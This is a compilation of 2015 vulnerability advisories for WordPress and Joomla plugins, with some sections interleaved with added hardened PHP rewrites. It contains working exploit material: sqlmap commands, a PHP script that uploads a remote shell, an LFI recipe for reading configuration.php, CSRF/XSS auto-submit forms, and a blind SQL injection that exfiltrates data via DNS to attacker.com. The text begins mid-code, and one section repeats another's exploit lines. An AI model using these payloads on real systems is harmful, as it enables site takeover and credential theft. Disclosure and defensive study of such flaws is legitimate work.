11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13     if (!file_exists($imagesDirectory)) {
14         mkdir($imagesDirectory);
15     }
 
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3


WordPress Easy2Map-Photos 1.09 SQL Injection

Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.
 
48         $wpdb->query(sprintf("UPDATE $mapsTable
49         SET PolyLines = '%s'
50         WHERE ID = '%s';", $PolyLines, $mapID));
218             $wpdb->query(sprintf("
219                 UPDATE $mapsTable
220                 SET TemplateID = '%s',
221                     MapName = '%s',
222                     Settings = '%s',
223                     CSSValues = '%s',
224                     CSSValuesPhoto = '%s',
225                     CSSValuesMap = '%s',
226                     MapHTML = '%s',
227                     IsActive = 1
228                 WHERE ID = %s;",
229                     $_REQUEST['mapTemplateName'],
230                     $_REQUEST['mapName'],
231                     urldecode($_REQUEST['mapSettingsXML']),
232                     urldecode($_REQUEST["parentCSSXML"]),
233                     urldecode($_REQUEST["photoCSSXML"]),
234                     urldecode($_REQUEST["mapCSSXML"]),
235                     urldecode($_REQUEST["mapHTML"]), $mapID));
 
 
238             //this is a map insert
239             if (!$wpdb->query(sprintf("
240             INSERT INTO $mapsTable(
241                 TemplateID,
242                 MapName,
243                 DefaultPinImage,
244                 Settings,
245                 LastInvoked,
246                 PolyLines,
247                 CSSValues,
248                 CSSValuesPhoto,
249                 CSSValuesMap,
250                 MapHTML,
251                 IsActive
252             ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'    , 0);",
253                     $_REQUEST['mapTemplateName'],
254                     $_REQUEST['mapName']
 
 
331         $wpdb->query(sprintf("
332             UPDATE $mapsTable
333             SET MapName = '%s'
334             IsActive = 1
335             WHERE ID = %s;",
336                 $_REQUEST['mapName'],
337                 $mapID));
 
Also
 
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:
 
   if (!file_exists($imagesDirectory)) {
       mkdir($imagesDirectory);
   }
 
CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3


WordPress CP Contact Form With Paypal 1.1.5 CSRF / XSS / SQL Injection

# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.
 
## Vulnerability Description:
 
The forms in the admin area of the plugin allow CSRF. This gives an
attacker the ability to add new forms, modify existing form settings,
launch XSS attacks, export CSV files of the messages, delete forms, and
perform SQL injection.
 
## Proof of Concept:
 
<h3>CSRF - Action Links</h3>
<ul>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export
to CSV</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">
Clone form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete
form/item</a></li>
</ul>
 
 
<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042"
method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />
 
<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't
work
<input type="hidden" name="cp_contactformpp_id"
value='"><script>alert(3);</script>' />
 
SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->
 
<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message
has been sent:<%INFO%></textarea><script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message.
We will reply you as soon as possible.This is a copy of the data
sent:<%INFO%>Best Regards.</textarea><script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>
 
## Solution:
 
Upgrade to v1.1.6
 
## Disclosure Timeline:
 
2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.


Joomla J2Store 3.1.6 SQL Injection

J2Store v3.1.6, a Joomla! extension that adds basic store functionality to
a Joomla! instance, suffered from two unauthenticated boolean-blind and
error-based SQL injection vulnerabilities. Since February 2015, J2Store has
had about 16,000 downloads as of this writing.
 
 
The first vulnerability was in the sortby parameter within a request made
while searching for products.
 
POST /index.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
 
search=&sortby=product_name+DESC&option=com_j2store&view=products&task=browse&Itemid=115
 
 
 
The second vulnerability was in an advanced search multipart form request,
within the manufacturer_ids parameters.
 
POST /index.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)
Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------69182815810793866481457026727
Content-Length: 1023
 
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="pricefrom"
 
0
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="priceto"
 
521
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="manufacturer_ids[]"
 
1
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="option"
 
com_j2store
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="view"
 
products
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="task"
 
browse
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="Itemid"
 
115
-----------------------------69182815810793866481457026727
Content-Disposition: form-data; name="9d0a4b9d6d4b46fc51d25844b91c2057"
 
1
-----------------------------69182815810793866481457026727--
 
 
A Metasploit scanner module and two auxiliary modules are available on the
ExploitHub store which will help you find and validate any vulnerable
instances. A PCAP is included with each module.
 
Free Metasploit scanner module:
https://exploithub.com/j2store-3-1-6-sql-injection-scanner.html
 
Metasploit User/Password Enumeration auxiliary module:
https://exploithub.com/j2store-3-1-6-user-password-enumeration-via-sql-injection.html
 
Metasploit Arbitrary File Read auxiliary module:
https://exploithub.com/j2store-3-1-6-arbitrary-file-read-via-sql-injection.html
 
 
Timeline
July 7 2015: Reported to vendor
July 7 2015: Vendor response asking for details
July 7 2015: Details sent
July 7 2015: Vendor sends email saying the vulnerabilities were fixed and a
new version will be out soon
July 8 2015: Version 3.1.7 released, advisory released with modules
 
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website


WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible with iPhone and iPads. It also allows use as a widget. You can also enable this Powerplay Gallery on your WordPress site by placing a code snippet in your template (.php) files. It shows a Flash gallery for desktops and a touch-enabled version for iPad and iPhones.
Vulnerability:
1. Ability to create directories outside of the upload path by using ../:
Lines 56-59 of upload.php:
 
56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }      
 
2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed:
 
138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" :     "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}    , "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }
 
3. SQL injection
Lines 131-135 of upload.php fail to handle user input appropriately, either by sanitizing or parameterizing it. The injection points are
any GET/POST value supplied in albumid or name.
 
131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 
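As an added example (not the plugin's code), here is a hardened rewrite of the three upload.php fragments above: the album id is used only as an integer, the target directory is proven to sit inside the WordPress uploads directory, the file name is stripped of path components and checked against an image allowlist, and the INSERT is bound through wpdb::prepare. The table name comes from the advisory; the $thumb path from the resize step, the error codes and the omission of chunked uploads are assumptions made to keep the example short.

```php
<?php
// Added example, not wp-powerplaygallery's code. Assumes the same request
// fields (albumid, name, file), the WordPress globals $wpdb / wp_upload_dir(),
// and a $thumb path produced by an earlier resize step (assumed, see below).
global $wpdb;
$thumb = isset($thumb) ? (string) $thumb : '';   // thumbnail path, assumed set earlier

function ppg_example_json_fail($code, $message) {
    // Same JSON-RPC style error the plugin emits, then stop processing.
    wp_send_json_error(array('code' => $code, 'message' => $message), 400);
}

// 1. albumid is only ever used as an integer: this removes both the "../"
//    directory escape and the unquoted value in the INSERT.
$album_id = isset($_REQUEST['albumid']) ? absint($_REQUEST['albumid']) : 0;
if ($album_id === 0) {
    ppg_example_json_fail(100, 'Invalid album id.');
}

// 2. Build the target directory from the integer only, then prove it resolves
//    inside the uploads directory before anything is written.
$upload     = wp_upload_dir();
$base_dir   = realpath($upload['basedir']);
$target_dir = $base_dir . '/power_play/' . $album_id . '_uploadfolder/big';
if (!file_exists($target_dir)) {
    wp_mkdir_p($target_dir);
}
$real_target = realpath($target_dir);
if ($base_dir === false || $real_target === false
    || strpos($real_target, $base_dir . DIRECTORY_SEPARATOR) !== 0) {
    ppg_example_json_fail(100, 'Upload path is outside the uploads directory.');
}

// 3. File name: drop any path component, then allow only image extensions,
//    so a name such as shell.php is rejected before the write.
$allowed   = array('jpg', 'jpeg', 'png', 'gif');
$raw_name  = isset($_REQUEST['name']) ? (string) $_REQUEST['name'] : '';
$file_name = sanitize_file_name(basename($raw_name));
$ext       = strtolower(pathinfo($file_name, PATHINFO_EXTENSION));
if ($file_name === '' || !in_array($ext, $allowed, true)) {
    ppg_example_json_fail(104, 'File type not allowed.');
}
if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    ppg_example_json_fail(103, 'Failed to move uploaded file.');
}
// The extension claims "image"; check that the bytes agree before writing
// into the web root.
if (getimagesize($_FILES['file']['tmp_name']) === false) {
    ppg_example_json_fail(104, 'Uploaded content is not an image.');
}
$dest = $real_target . DIRECTORY_SEPARATOR . $file_name;
if (!move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
    ppg_example_json_fail(102, 'Failed to open output stream.');
}

// 4. The INSERT from lines 131-135 with every user-derived value bound:
//    %d for the album id, %s for the names.
$table = $wpdb->prefix . 'pp_images';
$sql   = $wpdb->prepare(
    "INSERT INTO `{$table}` (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date`)
     VALUES (%d, %s, %s, '', %s, %s, 1, '', NULL)",
    $album_id, $file_name, $file_name, $thumb, $file_name
);
$wpdb->query($sql);
wp_send_json_success(array('file' => $file_name));
```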
 
CVEID:
OSVDB:
Exploit Code:
<?php
/* Remote shell upload exploit for wp-powerplaygallery v3.3 */
/* Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

  $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
  $file_name_with_full_path = '/var/www/shell.php';

  echo "POST to $target_url $file_name_with_full_path";
  $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL,$target_url);
  curl_setopt($ch, CURLOPT_POST,1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  $result=curl_exec ($ch);
  curl_close ($ch);
  echo "<hr>";
  echo $result;
  echo "<hr>";
?>
SQLi PoC:
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql



Joomla Docman Path Disclosure / Local File Inclusion

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
 
# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 The page title will then disclose the full server path.
 
# Xploit (LFD/LFI):
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we use the FPD Xploit to learn the target's path; after that we insert the path to 'configuration.php' (the database configuration file) and encode it in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 
 
And now we have the configuration file...


WordPress Count Per Day 3.4 SQL Injection

Advisory ID: HTB23267
Product: Count Per Day WordPress plugin
Vendor: Tom Braider 
Vulnerable Version(s): 3.4 and probably prior
Tested Version: 3.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: July 1, 2015 
Public Disclosure: July 22, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-5533
Risk Level: Medium 
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered an SQL Injection vulnerability in the Count Per Day WordPress plugin, which can be exploited to execute arbitrary SQL queries in the application's database, gain access to potentially sensitive information and compromise the entire website.
 
The vulnerability is caused by insufficient filtration of input data passed via the "cpd_keep_month" HTTP POST parameter to the "/wp-admin/options-general.php" script. A remote user with administrative privileges can manipulate SQL queries and inject and execute arbitrary SQL commands within the application's database.
This vulnerability can be exploited by an anonymous attacker via a CSRF vector, since the web application does not check the origin of HTTP requests.
 
The PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
 
 
<form action = "http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-options.php&tab=tools" method = "POST" name="f1">
<input type="hidden" name="collect" value="Collect old data">
<input type="hidden" name="do" value="cpd_collect">
<input type="hidden" name="cpd_keep_month" value="6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 2">
<input value="go" type="submit" />
</form><script>document.f1.submit();</script>
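The two controls the advisory says are missing on the "Collect old data" action, as an added example that is not Count Per Day's own code: a nonce bound to the logged-in user (which a cross-site auto-submitting form cannot forge) and an integer-only cpd_keep_month bound through wpdb::prepare, so the INTERVAL clause can no longer be closed early. The nonce action 'cpd_collect', the table and date column names, and the DELETE used to stand in for the plugin's aggregation logic are assumptions.

```php
<?php
// Added example, not Count Per Day's code. Table name, date column and the
// nonce action are assumed; the real collect/aggregate logic is not reproduced.

function cpd_example_render_collect_form() {
    ?>
    <form method="post">
        <?php wp_nonce_field('cpd_collect', 'cpd_nonce'); ?>
        <input type="hidden" name="do" value="cpd_collect">
        <label>Keep the last
            <input type="number" name="cpd_keep_month" min="1" max="120" value="6">
            months of detail</label>
        <input type="submit" name="collect" value="Collect old data">
    </form>
    <?php
}

function cpd_example_handle_collect() {
    global $wpdb;
    if (!isset($_POST['do']) || $_POST['do'] !== 'cpd_collect') {
        return null;
    }
    // CSRF: the auto-submitting form in the PoC carries no nonce valid for
    // this user and action, so the request dies here before any query exists.
    check_admin_referer('cpd_collect', 'cpd_nonce');
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }
    // "6 MONTH) AND 1=(select load_file(...)) -- 2" collapses to 6 here, and
    // the range check keeps the retention window sane.
    $keep = isset($_POST['cpd_keep_month']) ? absint($_POST['cpd_keep_month']) : 0;
    if ($keep < 1 || $keep > 120) {
        wp_die('Invalid retention period.', '', array('response' => 400));
    }
    // %d is cast with intval() inside wpdb::prepare, so only a bare integer
    // ever reaches the INTERVAL expression.
    $table = $wpdb->prefix . 'cpd_counter';   // assumed table name
    $sql   = $wpdb->prepare(
        "DELETE FROM `{$table}` WHERE `date` < DATE_SUB(CURDATE(), INTERVAL %d MONTH)",
        $keep
    );
    return $wpdb->query($sql);
}
add_action('admin_init', 'cpd_example_handle_collect');
```

The same pattern applies to admin-ajax.php handlers, where check_ajax_referer() takes the place of check_admin_referer().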
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Count Per Day 3.4.1
 
More Information:
https://wordpress.org/plugins/count-per-day/changelog/
https://plugins.trac.wordpress.org/changeset/1190683/count-per-day
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23267 - https://www.htbridge.com/advisory/HTB23267 - SQL Injection in Count Per Day WordPress Plugin.
[2] Count Per Day WordPress plugin - https://wordpress.org/plugins/count-per-day/ - A statistics plugin which displays Visit Counter, shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


WordPress Unite Gallery Lite 1.4.6 CSRF / SQL Injection

# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in
Unite Gallery Lite Wordpress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite Wordpress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper
Neutralization of Special Elements used in an SQL Command ('SQL
Injection')[CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff:
https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned
 
## Product Information:
 
The Unite Gallery is all in one image and video gallery for WordPress.
 
## Vulnerability Description:
 
The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible
to CSRF. Additionally, the following parameters were found to be
susceptible to SQLi -
 
Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]
 
Form submitted to /wp-admin/admin.php:
- galleryid
- id
 
## Proof of Concept:
 
<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>
 
<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery
test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]"
value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]"
value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]"
value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]"
value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]"
value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]"
value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]"
value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"
value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_align]"
value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]"
value='0' />
<input type="hidden" name="data[params][theme_navigation_position]"
value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]"
value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]"
value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]"
value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'
/>
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true'
/>
<input type="hidden" name="data[params][tile_outline_color]"
value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'
/>
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'
/>
<input type="hidden" name="data[params][tile_enable_image_effect]"
value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'
/>
<input type="hidden" name="data[params][tile_image_effect_reverse]"
value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'
/>
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'
/>
<input type="hidden" name="data[params][tile_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'
/>
<input type="hidden" name="data[params][tile_space_between_icons]"
value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]"
value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"
value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]"
value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"
value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"
value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]"
value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"
value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"
value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]"
value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]"
value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"
value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]"
